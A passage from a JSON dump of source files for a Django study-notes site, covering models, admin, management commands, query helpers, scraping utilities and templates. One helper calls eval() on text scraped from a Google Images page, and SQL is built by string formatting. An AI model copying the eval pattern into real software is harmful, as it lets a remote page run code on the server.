models.TextField(max_length=2000, blank=True, null=True)\n user = models.ForeignKey(User)\n\n class Meta:\n unique_together = ('url_hash',)\n \n def __unicode__(self):\n return '%s for %s' %(self.url, self.title)\n\n def save(self, *args, **kwargs):\n self.url_hash = hashlib.md5(self.url).hexdigest()\n super(Image, self).save(*args, **kwargs)\n\n @property\n def link(self):\n return '/image/%s/%s/' % (self.id, urlsafe(self.title[:LIMIT]))\n"
},
{
"alpha_fraction": 0.7541436553001404,
"alphanum_fraction": 0.7541436553001404,
"avg_line_length": 39.22222137451172,
"blob_id": "d0ea65d80d9e75fe1e4ed6b9019a49f84c725def",
"content_id": "2a3ca7fe1c811f7ba3cd44970c08820c44806a3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 362,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 9,
"path": "/www/core/admin.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom core.models import *\n\nfor model_klass in (Category, LeaderBoardData, Question, Answer,\\\n FBUserProfile, UserProfile, PointsHistory, Note, Book,\\\n Node, AssociatedMedia, Ratings, Follows, Video, Image, Tag, TagItem,\n RedeemableItem, RedemptionItem, Redemption, Attachment):\n \n admin.site.register(model_klass)\n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.6302631497383118,
"avg_line_length": 35.19047546386719,
"blob_id": "14964faf0d7f8fe548c45aa13c69ae6294b0cffd",
"content_id": "52bd24c7f9d539c738fcc9ff8d710c6749976dee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 760,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 21,
"path": "/www/core/management/commands/process_onliners.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import datetime\nfrom django.core.management.base import BaseCommand\nfrom core.models import *\n\nclass Command(BaseCommand):\n help = 'Find who are online in last one hour and update in Onliners Table.'\n args = ''\n\n def handle(self, *args, **options):\n one_hour_ago = datetime.datetime.now() - datetime.timedelta(hours=5)\n sql_datetime = datetime.datetime.strftime(one_hour_ago, '%Y-%m-%d %H:%M:%S')\n online_users = User.objects.filter(last_login__gt=sql_datetime,\n is_active__exact=1).order_by('-last_login')[:10]\n \n Onliners.objects.all().delete()\n\n for onliner in online_users:\n Onliners.objects.create(user = onliner)\n\n def usage(self, subcommand):\n return ''\n"
},
{
"alpha_fraction": 0.6160221099853516,
"alphanum_fraction": 0.6187845468521118,
"avg_line_length": 21.625,
"blob_id": "a14e4a0dd8bbafc4071983396957e192045f4fe0",
"content_id": "da1f45a075e1693b4f6dee98a8f9121a11120c86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 362,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 16,
"path": "/www/scripts/load_tags.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom core.models import Tag\nfrom django.db import IntegrityError\n\ndef main(tags_fname):\n Tag.objects.all().delete()\n\n tags = set([t.strip() for t in open(tags_fname)\\\n if t.strip() and not t.strip().startswith('#')])\n\n for tag in tags:\n Tag.objects.create(name=tag)\n\nif __name__ == '__main__':\n main(sys.argv[1])\n"
},
{
"alpha_fraction": 0.6081720590591431,
"alphanum_fraction": 0.6094623804092407,
"avg_line_length": 29.194805145263672,
"blob_id": "b5c0e94091789c6eb58bb7e5baba962f45d5d3f8",
"content_id": "a80fbf54fa20af8cf8e49b165998c47d7d91dd2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2325,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 77,
"path": "/www/core/query.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.db import IntegrityError\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db import connection\n\nfrom core.models import *\nfrom core.utils import get_gimages, get_ytvideos\nfrom core.utils import log, xcode\n\ndef get_top_users(limit=20):\n #return UserProfile.objects.filter(user__is_staff=False).order_by('-points')[:limit]\n toppers = Toppers.objects.order_by('id')\n return [t.user_profile for t in toppers]\n\ndef load_images(node, user):\n log.debug('load_images: %s, %s' % (node, user))\n\n images = get_gimages(xcode(node.title, mode='ignore'))\n I = Image.objects\n\n for title, url in images:\n try:\n image = I.create(title=title, url=url, user=user)\n except IntegrityError:\n image = I.get(url=url)\n\n try:\n aimage = AssociatedMedia.add(user, node, image)\n except IntegrityError:\n pass\n\ndef load_videos(node, user):\n title = xcode(node.title, mode='ignore')\n videos = get_ytvideos(title)\n\n V = Video.objects\n\n for title, yt_id in videos:\n\n log.debug('Adding video: %s, %s ...' % (yt_id, title))\n\n try:\n video = V.create(source='youtube', source_id=yt_id,\n user=user, title=title)\n except IntegrityError:\n log.debug('Video exists already')\n video = V.get(source='youtube', source_id=yt_id)\n\n try:\n avideo = AssociatedMedia.add(user, node, video)\n except IntegrityError:\n pass\n\ndef get_items_by_tag(model, tags, query_type='all'):\n item_type = ContentType.objects.get_for_model(model).id\n\n tags = [str(t.id) for t in Tag.objects.filter(name__in=tags)]\n if not tags:\n return model.objects.none()\n\n query = '''SELECT item_id FROM core_tagitem\n WHERE item_type_id = %s AND tag_id IN (%s)\n GROUP BY item_id '''\n\n if query_type == 'all':\n query = query + 'HAVING COUNT(item_id) = %s'\n params = (item_type, ','.join(tags), len(tags))\n\n else:\n params = (item_type, ','.join(tags))\n\n query = query % params\n cursor = connection.cursor()\n cursor.execute(query)\n\n item_ids = [row[0] for row in cursor.fetchall()]\n objs = model.objects\n return objs.filter(id__in=item_ids) if item_ids else objs.none()\n"
},
{
"alpha_fraction": 0.4414498209953308,
"alphanum_fraction": 0.45260223746299744,
"avg_line_length": 26.564102172851562,
"blob_id": "8acee49736127103ffca5c9da1dde6c94ad1e1d2",
"content_id": "334c403b3cd5bcd52430d47e75233b719b7641ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1076,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 39,
"path": "/www/core/templates/renderables/group_base.html",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "\n{% load filters %}\n{% load tags %}\n\n{% block digest %}\n{% endblock %}\n\n{% block activities %}\n \n <div class=\"group-expand\">\n\t<a href=\"#\" style=\"\" id=\"ag_see_{{ activities.0.id }}\">expand</a>\n </div>\n\n <div class=\"grid_11 alpha omega\">\n\n <div id=\"ag_{{ activities.0.id }}\" class=\"expanded-group roundedges\">\n \n {% for a in activities %}\n {% render a 'image,more,-flag,-addedby,context' %}\n\n {% if not forloop.last %}\n\t\t<div class=\"grid_11 alpha hrdiv\"></div>\n <div class=\"grid_11 alpha\"><br/></div>\n {% else %}\n\t\t<div class=\"group-collapse\"> \n <a href=\"#\" id=\"ag_hide_{{ activities.0.id }}\">collapse</a>\n </div>\t\n\t\t{% endif %}\n {% endfor %}\n \n\t </div>\n\n <script>\n $(document).ready(function(){\n setup_showhide('#ag_see_{{ activities.0.id }}', '#ag_hide_{{ activities.0.id }}', '#ag_{{ activities.0.id }}');\n })\n </script>\n\n </div>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.6206896305084229,
"alphanum_fraction": 0.6206896305084229,
"avg_line_length": 42.5,
"blob_id": "bba0e3f03fc77ceeb381907f547cc62dfeed0bac",
"content_id": "cf7b2009d045b5c11f018a772559d901d564f52b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 174,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 4,
"path": "/www/core/templates/renderables/flag.html",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "{% load tags %}\n\n<a class=\"username\" href=\"{{ obj.user.get_profile.link }}\">{{ obj.user.get_profile.title }}</a> flagged {% render obj.target %}<br/>\n{{ obj.date_added|dt }}\n"
},
{
"alpha_fraction": 0.6214318871498108,
"alphanum_fraction": 0.6214318871498108,
"avg_line_length": 60.05714416503906,
"blob_id": "ac3ff310e5f0761bcea11c4749da7dc4d4acb38c",
"content_id": "4f4991f7392fac7aef23f58d42cca69c0f705aaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2137,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 35,
"path": "/www/core/management/commands/create_notifications.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.core.management.base import BaseCommand\nfrom django.utils.translation import ugettext_noop as _\nfrom notification import models as notification\n\nclass Command(BaseCommand):\n help = 'Creates notification types. Run once at installation time.'\n args = ''\n\n def handle(self, *args, **options):\n create = notification.create_notice_type\n create('question_add', _('Question Added'), _('A new question has been added'))\n create('question_rated', _('Question Rated'), _('Question has been rated'))\n create('answer_add', _('Answer Added'), _('A new answer has been added'))\n create('answer_rated', _('Answer Rated'), _('Answer has been rated'))\n create('video_add', _('Video Added'), _('A new video has been added'))\n create('video_rated', _('Video Rated'), _('Video has been rated'))\n create('note_add', _('Notes Added'), _('Notes has been added'))\n create('note_rated', _('Note Rated'), _('Note has been rated'))\n create('note_changed', _('Note Changed'), _('Note has been changed'))\n create('profile_changed', _('Profile Changed'), _('Profile has been changed'))\n create('profile_rated', _('Profile Rated'), _('Profile has been rated'))\n create('book_rated', _('Book Rated'), _('Book has been rated'))\n create('node_rated', _('Topic Rated'), _('Topic has been rated'))\n create('user_level_changed', _('Level Changed'), _('Level has changed'))\n create('book_mod_request', _('Book Mod Requested'), _('A user has requested permissions to moderate book'))\n create('credits_earned', _('Credits Earned'), _('You have earned credits'))\n create('user_redeemed', _('User Redeemed'), _('User has redeemed credits'))\n create('comment_add', _('Commented'), _('A new comment has been added'))\n create('ppost_add', _('New Profile Post'), _('A new post has been made on a profile'))\n\n create('_user_joined', _('User Joined'), _('A new user has been joined'))\n create('_user_feedback', _('User Feedback'), _('Feedback from user'))\n\n def usage(self, subcommand):\n return ''\n"
},
{
"alpha_fraction": 0.5617855191230774,
"alphanum_fraction": 0.5733079314231873,
"avg_line_length": 27.117347717285156,
"blob_id": "a7ce475a7cd42849724edc75452b1737f73d7763",
"content_id": "738e3633fb4059cc32896cb6e3796948e158eee1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11022,
"license_type": "no_license",
"max_line_length": 535,
"num_lines": 392,
"path": "/www/core/utils.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import os\nimport re\nimport hashlib\nimport random\nimport urllib\nimport urllib2\nimport socket\nimport logging\nfrom itertools import chain, islice\n\nimport feedparser\n\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils.html import strip_tags\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.template import Context\nfrom django.db.models.query import QuerySet\nfrom django.core.mail.backends.smtp import EmailBackend as SMTPEmailBackend\nimport django.core.mail as mail\n\nsocket.setdefaulttimeout(10)\nlog = logging.getLogger()\nDEFAULT_USERAGENT = 'Mozilla/5.001 (windows; U; NT4.0; en-US; rv:1.0) Gecko/25250101'\n\nHANDLING_CREDITS = 0\n\ndef xcode(string, encoding='utf8', mode='strict'):\n try:\n if isinstance(string, unicode):\n string = string.encode(encoding, mode)\n else:\n string = string.decode(encoding, mode)\n except:\n string = None\n\n return string\n\ndef urlsafe(string):\n string = xcode(string, 'ascii', 'ignore')\n string = string.replace('%', '')\n string = string.replace(' ', '.')\n string = string.replace('\\'', '')\n string = string.replace('\"', '')\n string = string.replace('?', '')\n return string\n\ndef get_doc(url, cache=None, user_agent=None):\n\n cache_id = hashlib.md5(url).hexdigest()\n data = None\n user_agent = user_agent or DEFAULT_USERAGENT\n\n if cache and isinstance(cache, (str, unicode)):\n cache = DirectoryCache(cache)\n\n request = urllib2.Request(url)\n request.add_header('User-Agent', user_agent)\n opener = urllib2.build_opener()\n\n if cache:\n data = cache.get(cache_id)\n \n if not data:\n data = opener.open(request).read()\n\n if cache:\n cache.set(cache_id, data)\n\n return data\n\nclass Cache:\n '''\n Represents a crawl cache\n '''\n def __init__(self):\n raise NotImplemented\n\n def get(self, id):\n '''\n Get data for specified id from cache\n @id (str)\n '''\n raise NotImplemented\n\n def set(self, id, data):\n '''\n Set data for specified id in cache\n @id (str)\n @data (str)\n '''\n raise NotImplemented\n\nclass DirectoryCache(Cache):\n '''\n A file system directory cache\n '''\n def __init__(self, cache_dir):\n '''\n @cache_dir (str) - location to store cache files / read from\n '''\n self.cache_dir = cache_dir\n if not os.path.exists(cache_dir):\n raise Exception('Cache dir : %s not present' % cache_dir)\n\n def get_path(self, id):\n hash = hashlib.md5(id).hexdigest()\n dir_one = hash[:2]\n dir_two = hash[2:4]\n\n path = os.path.join(self.cache_dir, dir_one, dir_two)\n if not os.path.exists(path): os.makedirs(path)\n\n fpath = os.path.join(path, id)\n return fpath\n\n def get(self, id):\n path = self.get_path(id)\n data = None\n if os.path.exists(path):\n data = open(path).read()\n return data\n\n def set(self, id, data):\n path = self.get_path(id)\n assert(isinstance(data, str))\n open(path, 'w').write(data)\n\ndef _get_image_links(data):\n images = []\n\n data = re.findall('dyn.setResults\\((.*?)\\);</script>', data)[0]\n data = data[1:-1]\n data = eval(data)\n\n for item in data:\n #['/imgres?imgurl=http://musicalstewdaily.files.wordpress.com/2009/02/broken_heart_by_starry_eyedkid-1.jpg&imgrefurl=http://nappybrain.wordpress.com/&usg=__-DklieMA2JoqK37viOcmLC65k58=&h=872&w=947&sz=551&hl=en&start=21&itbs=1', '', 'M-QmlkObDYlaYM:', 'http://musicalstewdaily.files.wordpress.com/2009/02/broken_heart_by_starry_eyedkid-1.jpg', '148', '136', 'You broke my <b>heart</b> last night', '', '', '947 x 872 - 551k', 'jpg', 'nappybrain.wordpress.com', '', '', 'http://t2.gstatic.com/images', '1', [], '', 1, '', [], '']\n url = item[3]\n title = strip_tags(item[6])\n images.append([title, url])\n\n return images\n\ndef _get_image_links1(data):\n images = []\n _images = re.findall('imgurl=.*? height=', data)\n\n for i in _images:\n imglink = re.findall('imgurl=(.*?)&imgrefurl', i)[0]\n thumblink = re.findall('<img src=(.*):http', i)[0]\n images.append(['', imglink])\n\n return images\n\ndef get_gimages(sstring):\n log.debug('get_gimages: %s' % sstring)\n\n sstring = urllib.quote_plus(sstring)\n url = 'http://images.google.com/images?as_st=y&gbv=2&hl=en&'\\\n 'safe=active&tbo=1&sa=1&q=%s&aq=f&oq=&aqi=&start=0' % sstring\n data = get_doc(url, settings.CACHE_DIR, DEFAULT_USERAGENT)\n\n images = _get_image_links(data)\n if not images:\n images = _get_image_links1(data)\n\n return images\n\ndef get_ytvideos(sstring):\n log.debug('get_ytvideos: %s' % sstring)\n\n url = 'http://gdata.youtube.com/feeds/api/videos?orderby=relevance'\\\n '&start-index=1&max-results=20&v=2&safeSearch=strict&q=%s'\n url = url % urllib.quote_plus(sstring)\n\n data = get_doc(url, settings.CACHE_DIR)\n feed = feedparser.parse(data)\n\n videos = []\n for e in feed.entries:\n title = e.title\n\n # FIXME: Some titles are being screwed by feedparser\n if not isinstance(title, unicode):\n try:\n title = title.xcode('utf8')\n except:\n continue\n\n\n # Sometimes the field of video id is different\n video_id = getattr(e, 'yt_videoid', None) or getattr(e, 'videoid', None)\n if not video_id:\n continue\n\n videos.append((title, video_id))\n\n log.debug('found %d videos' % len(videos))\n return videos\n\ndef get_target(target_type, target):\n target_type = ContentType.objects.get(id=int(target_type))\n\n try:\n target = target_type.get_object_for_this_type(id=int(target))\n except ObjectDoesNotExist:\n target = None\n\n return target\n\ndef get_target_from_req(req):\n target_type = req.POST['target_type']\n target = req.POST['target']\n\n return get_target(target_type, target)\n\ndef sanitize_whitespace(text):\n text = re.sub('\\t+', ' ', text)\n text = re.sub('\\n+', '\\n', text)\n text = re.sub(' +', ' ', text)\n return text\n\ndef make_context(context):\n c = Context()\n keys = list(set(chain(*[d.keys() for d in context.dicts])))\n\n for k in keys:\n c[k] = context[k]\n\n return c\n\ndef parse_flags(flags):\n if not flags:\n return {}\n \n flags = [x.strip() for x in flags.split(',') if x.strip()]\n flags = [('is_' + x.split('-')[-1] if x.startswith('-') else 'is_' + x,\n not x.startswith('-')) for x in flags]\n flags = dict(flags)\n return flags\n\nclass QuerySetFilter(QuerySet):\n '''\n Filters a queryset and transforms the returned items\n using a user specified function. The fn is applied\n to every item and its return value is returned.\n\n If the fn returns None for a certain item, then that\n is filtered from the queryset\n '''\n\n def __init__(self, object_list, fn=lambda x: x):\n self.object_list = object_list\n self.fn = fn\n\n def __len__(self):\n return self.count()\n\n def count(self):\n return self.object_list.count()\n\n def __wrap_iter(self, iterator):\n for x in iterator:\n x = self.fn(x)\n if x is not None:\n yield x\n\n def __iter__(self):\n return self.__wrap_iter(iter(self.object_list))\n\n def __nonzero__(self):\n return self.object_list.__nonzero__()\n\n def all(self):\n return QuerySetFilter(self.object_list.all(), self.fn)\n\n def __getitem__(self, k):\n\n if k == 'count':\n return self.count()\n\n elif isinstance(k, slice):\n start, stop, step = k.indices(self.object_list.count())\n\n all = iter(self)\n items = []\n\n while len(items) < (stop - start):\n try:\n items.append(all.next())\n except StopIteration:\n break\n\n return items\n\n elif isinstance(k, int):\n return self.fn(self.object_list.__getitem__(int))\n \nclass QuerySetMerge(QuerySet):\n def __init__(self, querysets, key='-date_added'):\n self.querysets = querysets\n if key.startswith('-'):\n self.ascending = False\n self.key = key[1:]\n else:\n self.ascending = True\n self.key = key\n\n def xmerge(self, ln, ascending=True):\n \"\"\" Iterator version of merge.\n \n Assuming l1, l2, l3...ln sorted sequences, return an iterator that\n yield all the items of l1, l2, l3...ln in ascending order.\n Input values doesn't need to be lists: any iterable sequence can be used.\n \"\"\"\n # Adapted from: http://code.activestate.com/recipes/141934-merging-sorted-sequences/\n\n pqueue = []\n for i in map(iter, ln):\n try:\n pqueue.append((i.next(), i.next))\n except StopIteration:\n pass\n pqueue.sort()\n if ascending:\n pqueue.reverse()\n X = max(0, len(pqueue) - 1)\n while X:\n d,f = pqueue.pop()\n yield d\n try:\n # Insort in reverse order to avoid pop(0)\n pqueue.append((f(), f))\n pqueue.sort()\n if ascending:\n pqueue.reverse()\n except StopIteration:\n X-=1\n if pqueue:\n d,f = pqueue[0]\n yield d\n try:\n while 1: yield f()\n except StopIteration:pass\n\n def __len__(self):\n return self.count()\n\n def count(self):\n return sum(q.count() for q in self.querysets)\n\n def __iter__(self):\n qsets = [((getattr(x, self.key), x) for x in q) for q in self.querysets]\n merged = self.xmerge(qsets, self.ascending)\n return (x for k, x in merged)\n\n def __nonzero__(self):\n return self.count() != 0\n\n def all(self):\n return self\n\n def __getitem__(self, k):\n if k == 'count':\n return self.count()\n\n elif isinstance(k, slice):\n start, stop, step = k.indices(self.count())\n return islice(iter(self), start, stop, step)\n\nclass RoundRobinEmailBackend(SMTPEmailBackend):\n def __init__(self, *args, **kwargs):\n super(RoundRobinEmailBackend, self).__init__(*args, **kwargs)\n self.username = random.choice(settings.RR_EMAIL_USERS)\n\ndef get_md5(f):\n md5 = hashlib.md5()\n while True:\n chunk = f.read(128)\n if not chunk:\n break\n md5.update(chunk)\n return md5.hexdigest()\n\nclass StripCookieMiddleware(object):\n \"\"\"Ganked from http://2ze.us/Io\"\"\"\n\n STRIP_RE = re.compile(r'\\b(_[^=]+=.+?(?:; |$))')\n\n def process_request(self, request):\n cookie = self.STRIP_RE.sub('', request.META.get('HTTP_COOKIE', ''))\n request.META['HTTP_COOKIE'] = cookie\n"
},
{
"alpha_fraction": 0.5039380192756653,
"alphanum_fraction": 0.5264041423797607,
"avg_line_length": 37.341583251953125,
"blob_id": "ec0fb0bd609932ebdbd586cc9004633d8bf12ac2",
"content_id": "2c2311f342a04d6d31b0022792b4ea1123a0e9da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 7745,
"license_type": "no_license",
"max_line_length": 227,
"num_lines": 202,
"path": "/www/core/templates/ui/user_base.html",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "{% extends \"ui/base.html\" %}\n\n{% load filters %}\n{% load tags %}\n\n{% block title %}\n\n <meta property=\"fb:app_id\" content=\"356589223428\" /> \n <meta property=\"og:type\" content=\"profile\" /> \n <meta property=\"og:url\" content=\"{{ page_user.get_profile.link }}\" /> \n <meta property=\"og:title\" content=\"{{ page_user.get_full_name }}\" /> \n <meta property=\"og:description\" content=\"Profile of {{ page_user.get_full_name }}\" /> \n <meta property=\"og:image\" content=\"{{ page_user.get_profile.image }}\" /> \n\n\n{% if page_user %}\n<div class=\"grid_11 alpha\">\n <span class=\"title\"><a href=\"{{ page_user.get_profile.link }}\">{{ page_user.get_full_name }} ({{page_user.username}})</a></span>\n (<span>{% rate page_user.get_profile %}, </span>\n <span>{% follow page_user.get_profile %}, </span>\n <span>{% flag page_user.get_profile %}</span>)\n <br/>\n {% if page_user.get_profile.location %}\n from <i>{{ page_user.get_profile.location }}</i>,\n {% endif %}\n {% if page_user.get_profile.institution %}\n affiliated to <i>{{ page_user.get_profile.institution }}</i>,\n {% endif %}\n joined {{ page_user.date_joined|dt }}\n <br/>\n</div>\n\n{% ifequal user.username page_user.username %}\n<div class=\"grid_5 omega\">\n <a href=\"/user/edit/\">\n <img src=\"/static/images/edit.png\" alt=\"edit\"/>\n </a>\n</div>\n{% endifequal %}\n{% endif %}\n\n{% endblock title %}\n\n\n{% block content %}\n\n <div class=\"grid_11 alpha\"><br/></div>\n <div class=\"grid_11 alpha\">\n {% profilepost page_user.get_profile page_user.get_profile.title 0 %}\n </div>\n <div class=\"grid_11 alpha\"><br/></div>\n\n <div class=\"grid_11 alpha\">\n {% block listing %}\n {% endblock %}\n </div>\n\n <div class=\"grid_11 alpha\"><br/></div>\n \n {% block pagination %}\n <div class=\"grid_11 alpha\">\n {% paginator stream paging_url %}\n </div>\n {% endblock %}\n\n{% endblock content %}\n\n\n{% block sidebar %}\n\n <center>\n {% if page_user.get_profile.image %}\n <img src=\"{{ page_user.get_profile.image|thumbnail:'200x200' }}\"/>\n {% else %}\n <img src=\"{{ '/static/images/user.png'|thumbnail:'200x200' }}\"/>\n {% endif %}\n </center>\n \n {% if page_user.get_profile.note.text.raw %}\n <div class=\"note\">\n {{ page_user.get_profile.note.text }}\n </div>\n <div class=\"grid_11 alpha\"><br/></div>\n {% endif %}\n\n <center class=\"emphasize\">\n <big>{{ page_user.get_profile.level_name }} ({{ page_user.get_profile.level }})</big><br/>\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.points }}</strong> of {{ page_user.get_profile.points_for_current_level }}</font> <a href=\"/user/{{page_user.get_profile.user.username}}/points/\">points</a>\n </center>\n \n {% ifequal user.username page_user.username %}\n <center class=\"\" style=\"border:1px solid;border-color:#E3E0D5;border-top:0px;border-bottom:0px\">\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.credits }}</strong></font> <a href=\"/redeem/\">credits</a>\n </center>\n {% endifequal %}\n\n <center class=\"activities-box\">\n <table>\n <tr>\n <td colspan=\"5\">\n <center>\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.activities.count }}</strong></font> <a title=\"Activities\" href=\"/user/{{page_user.username}}/\">Activities</a>\n </center>\n <div class=\"hrdiv\"><br/></div>\n </td>\n </tr>\n <tr>\n <td align=\"right\">\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.questions.count }}</strong></font>\n </td>\n <td>\n <a title=\"Questions asked\" href=\"/user/{{page_user.username}}/questions/\">Questions</a>\n </td>\n <td></td>\n <td align=\"right\">\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.answers.count }}</strong></font>\n </td>\n <td>\n <a title=\"Answers given\" href=\"/user/{{page_user.username}}/answers/\">Answers</a>\n </td>\n </tr>\n <tr>\n <td align=\"right\">\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.notes.count }}</strong></font>\n </td>\n <td>\n <a title=\"Notes written\" href=\"/user/{{page_user.username}}/notes/\">Notes</a>\n </td>\n <td></td>\n <td align=\"right\">\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.videos.count }}</strong></font>\n </td>\n <td>\n <a title=\"Videos added\" href=\"/user/{{page_user.username}}/videos/\">Videos</a>\n </td>\n </tr>\n <tr>\n <td align=\"right\">\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.books.count }}</strong></font>\n </td>\n <td>\n <a title=\"Books maintained\" href=\"/user/{{page_user.username}}/books/\">Books</a>\n </td>\n <td></td>\n <td align=\"right\">\n <font style=\"font-size: 16pt\"><strong>{{ page_user.get_profile.following_books.count }}</strong></font>\n </td>\n <td>\n <a title=\"Following Books\" href=\"/user/{{page_user.username}}/fbooks/\">FBooks</a>\n </td>\n </tr>\n </table>\n </center>\n\n {% if page_user.get_profile.followers.all %}\n <div class=\"grid_5 alpha omega\"><br/></div>\n <div class=\"grid_5 alpha omega section-header\">Followers - {{ page_user.get_profile.followers.all.count }} <small><a href=\"{{ page_user.get_profile.followers_link }}\">see all</a></small></div>\n <div class=\"grid_5 alpha omega\">\n {% for f in page_user.get_profile.followers.all|slice:'14' %}\n {% render f.user.get_profile 'image,-text' %}\n {% endfor %}\n </div>\n {% endif %}\n\n {% if page_user.get_profile.following %}\n <div class=\"grid_5 alpha omega\"><br/></div>\n <div class=\"grid_5 alpha omega section-header\">Following - {{ page_user.get_profile.following.count }} <small><a href=\"{{ page_user.get_profile.following_link }}\">see all</a></small></div>\n <div class=\"grid_5 alpha omega\">\n {% for f in page_user.get_profile.following|slice:'14' %}\n {% render f.user.get_profile 'image,-text' %}\n {% endfor %}\n </div>\n {% endif %}\n<!--\n <div class=\"grid_5 alpha omega\">\n Place this tag where you want the badge to render\n <g:plus href=\"https://plus.google.com/103712232789698401189\" size=\"badge\"></g:plus>\n </div>\n-->\n <div class=\"grid_5 omega gad\">\n <div class=\"grid_5 alpha gid\"><br/></div>\n <script type=\"text/javascript\"><!--\n google_ad_client = \"ca-pub-2945383363046281\";\n /* 300 x 250, notemonk box listing page bottom */\n google_ad_slot = \"9649030723\";\n google_ad_width = 300;\n google_ad_height = 250;\n //-->\n </script>\n <script type=\"text/javascript\"\n src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\n </script>\n\n <!-- medium_rectangle -->\n<!-- <div id='div-gpt-ad-1319891242082-0' style='width:300px; height:250px;'>\n <script type='text/javascript'>\n googletag.cmd.push(function() { googletag.display('div-gpt-ad-1319891242082-0'); });\n </script>\n </div>\n-->\n </div>\n{% endblock sidebar %}\n"
},
{
"alpha_fraction": 0.49794802069664,
"alphanum_fraction": 0.5512995719909668,
"avg_line_length": 22.967212677001953,
"blob_id": "335f8889feb10ba15752cb7a231183c6c42e17fb",
"content_id": "10da2b95375c3fb18e50063433329debfb21c4dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1462,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 61,
"path": "/www/core/templates/ui/redeemables.html",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "{% extends \"ui/base.html\" %}\n\n{% load tags %}\n\n{% block title %}\n <div class=\"grid_11 alpha\">\n <span class=\"title\">Redeemables</a></span>\n </div>\n{% endblock title %}\n\n{% block content %}\n\n<div class=\"grid_11 alpha\"><br/></div>\n\n{% for r in redeemables.object_list %}\n\n <div class=\"grid_11 alpha\">\n {% render r 'more' %}\n </div>\n\n <div class=\"grid_11 alpha\"><br/></div>\n\n{% endfor %}\n\n<div class=\"grid_11 alpha\">\n {% paginator redeemables paging_url %}\n</div>\n\n{% endblock content %}\n\n{% block sidebar %}\n {% cart %}\n\n <div class=\"grid_5 omega\">\n <div class=\"grid_5 alpha omega\"><br/></div>\n <script type=\"text/javascript\"><!--\n google_ad_client = \"ca-pub-2945383363046281\";\n /* redeemables right first */\n google_ad_slot = \"6982616791\";\n google_ad_width = 250;\n google_ad_height = 250;\n //-->\n </script>\n <script type=\"text/javascript\"\n src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\n </script>\n\n <script type=\"text/javascript\"><!--\n google_ad_client = \"ca-pub-2945383363046281\";\n /* redeemables right second */\n google_ad_slot = \"2727111707\";\n google_ad_width = 250;\n google_ad_height = 250;\n //-->\n </script>\n <script type=\"text/javascript\"\n src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\n </script>\n\n </div>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.5166835188865662,
"alphanum_fraction": 0.5247725248336792,
"avg_line_length": 20.477272033691406,
"blob_id": "0d04844fe25c052fc299357e7ebe4454605fe8ab",
"content_id": "e84a2c07ad6d505bb43ee7ab6c80160ad094ee0f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 989,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 44,
"path": "/www/core/templates/registration/registration_form.html",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
